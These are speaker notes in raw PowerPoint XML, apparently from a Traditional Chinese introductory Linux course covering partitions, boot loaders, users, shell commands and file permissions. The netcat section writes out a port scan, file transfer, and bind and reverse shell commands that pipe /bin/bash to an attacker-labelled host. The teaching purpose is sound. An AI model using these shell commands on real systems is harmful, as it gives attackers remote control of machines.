            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scan:nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –z –v –n 127.0.0.1 21-25 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃描本機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port21-port25)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案傳送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4"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>傳送端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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l [URL] [port] &lt; file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接收端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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n [URL] [port] &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>save_file_path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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896145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硬體裝置在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中的檔名如附表所示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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系統中，每一個硬體都被當成一個檔案來對待，例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D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介面硬碟名稱即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dev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hd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a-d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059847"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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Bind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沒有防火牆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r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於目標上建立監聽 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，使用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執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –l –p 1234 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊者與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建立連線</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目標 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>URL] 1234 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> more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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成連線後下達攻擊的指令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5799003"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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Reverse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有防火牆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r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攻擊者監聽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –l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v –p 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下頁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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5913016"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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Reverse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有防火牆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r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目標主機主動與攻擊者的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建立連線，並使用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去執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>URL]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e /bin/bash 1234 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> more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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成連線後攻擊者下達的指令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8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82528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假設硬碟裝置檔名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dev/ha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時，上述四個分割槽檔名如下：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1:/dev/hda1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2:/dev/hda2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3:/dev/hda3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4:/dev/hda4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4777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C973DB-5138-40E4-9CE7-38821B7F803F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一章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作業系統介紹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部分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean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硬碟預設的分割表僅能寫入四組分割資訊，這四組分割資訊我們稱為主要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rimary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延伸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xtende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割槽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042350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主要分割與延伸分割最多可以有四筆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硬碟限制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延伸分割最多只能有一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作業系統限制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邏輯分割是由延伸分割持續切割出來的分割槽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邏輯分割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系統中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D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硬碟最多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59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個邏輯分割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5-63)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ATA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硬碟則有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1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個邏輯分割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5-15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91661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練習題如圖所示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163511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每個分割槽傭有自己的開機磁區</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Boot loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>實際可開機的核心檔案是放置到各分割槽內</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Loader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只認識自己系統槽內的的可開機核心檔案及其他的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Loader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可直接指向或間接將管理權專交給另一個管理程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多種開機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建議</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>先裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，原因為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以選擇將開機程式安裝於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>MBR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或是各別分割槽的開機磁區</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則會主動覆蓋掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>MBR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以及自己所在分割槽的開機磁區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78468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下有兩類用戶：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用戶：超級用戶，即係統管理員，系統的擁有者，在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系統中有且只有​​一個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用戶，是對系統的一切都具有完全的訪問權限的用戶，可以在系統中任何操作；並可由它建立多個普通用戶，共同使用該計算機系統。 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用戶的密碼在系統安裝時由安裝者設定。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>普通用戶：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系統可以創建許多普通用戶，並為其指定相應的權限，使其有限地使用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系統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878345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登入畫面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42734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Ctrl]+[Alt]+[F1]~[F6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入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tty1~6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終端機介面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Ctrl]+[Alt]+[F7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輸入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tartx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進入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-window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形介面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Alt]+ [Ctrl]+[Backspace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重新啟動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-window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exit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登出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Tab]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命令補全或檔案補齊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Ctrl]+c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中斷指令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Ctrl]+d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直接離開文字介面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94231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直接在命令提示輸入兩次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Tab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鍵，會出現所有可以執行的指令，在系統裡數千個指令，對我們而言，不可能全部記得其使用方法。當我們對指令不知道怎麼使用時，可以使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來查詢，例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 dat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此時會出現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ate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這個指令的操作說明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就是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ual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操作說明的簡寫，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是有分大小寫的，同學千萬要注意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269228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直接在命令提示輸入兩次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[Tab]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鍵，會出現所有可以執行的指令，在系統裡數千個指令，對我們而言，不可能全部記得其使用方法。當我們對指令不知道怎麼使用時，可以使用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來查詢，例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 date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此時會出現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ate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這個指令的操作說明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就是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anual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操作說明的簡寫，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是有分大小寫的，同學千萬要注意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06777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必須是管理者才能具有關機的權力，使用參數範例如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h now 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立即關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h 20:25 20:25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關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h +10 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十分鐘關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r now  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立即重新開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r +30’The system will reboot’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發送訊息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30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後關機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shutdown –k now ’The system will reboot’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發送關機訊息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 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其它與關機有關的指令例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ync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將記憶體的資料寫入硬碟中，避免資料遺失。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#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sync;sync;sync;reboot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eboot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oweroff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hal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739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zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>電腦系統分成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>四</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>個元件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、應用程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Shell+Kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>硬體</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>「用戶」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指的是電腦系統的使用者，但未必是指一個人，他也可能是另一部電腦。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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應用程式」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>則是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>一群指令的組合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，它定義著如何使用各種計算資源來解決用戶的問題。在多人多工的環境下，一部電腦要同時面對數個用戶不同的需求，換言之，就是電腦得同時執行數個應用程式，這時候在資源的使用上很可能會產生衝突，如果有幾個應用程式使用的是同一份資料檔，那麼資料如何分享又是一個問題。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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真正在控制硬體工作介面包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU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排程、記憶體管理、磁碟輸出輸入等工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>「硬體」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>電腦的各個實體單位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>中央處理器(CPU)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>隨機存取記憶體(RAM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>輸出輸入裝置(I/O Device)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等，它們提供了電腦系統最基本的計算資源。</a:t>
            </a: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956650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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>往下翻一頁</a:t>
            </a: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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>往下翻一頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>往上翻一頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回到最前頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>到最終頁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691224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200" dirty="0" smtClean="0"/>
              <a:t>向上搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>?list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>向下搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>N,n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>繼續查詢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15839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指令下達一般寫法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# command [-options] parameter1 parameter2 ...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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一行指令的第一個單字，一定是可執行指令。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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>該指令可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>加上其他特殊功能參數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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數後可加其他附加參數或其他功能變數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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後，代表開始執行該串指令。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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大小寫是完全不同的意義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64357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3400" dirty="0" smtClean="0"/>
              <a:t>“;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>連續下多個指令分號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 smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ~]# command1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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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60521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三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un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檔案權限與目錄配置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02075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三</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US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章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un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的檔案權限與目錄配置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877973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wxrwxrwx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第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欄代表類型與權限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2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目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2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檔案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2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連結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link file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2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可隨機存取裝置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2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序列埠裝備如鍵盤或滑鼠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第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-4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欄擁有者權限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第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5-7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欄所屬群組權限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1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第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8-10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欄其他使用者權限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80688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檔案類型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檔案所有者的存取權限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同組用戶的存取權限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其他用戶的存取權限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檔案所有者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檔案所屬組群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676493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檔案類型有下列幾種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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為普通檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為目錄檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為符號鏈接檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為塊設備檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裝置檔裡面的可供儲存的周邊設備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可隨機存取裝置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為字符設備檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>序列埠設備，例如鍵盤、滑鼠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444066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三種基本的訪問權限對檔案的含義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r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以讀取檔案的內容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以新增、修改檔案內容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
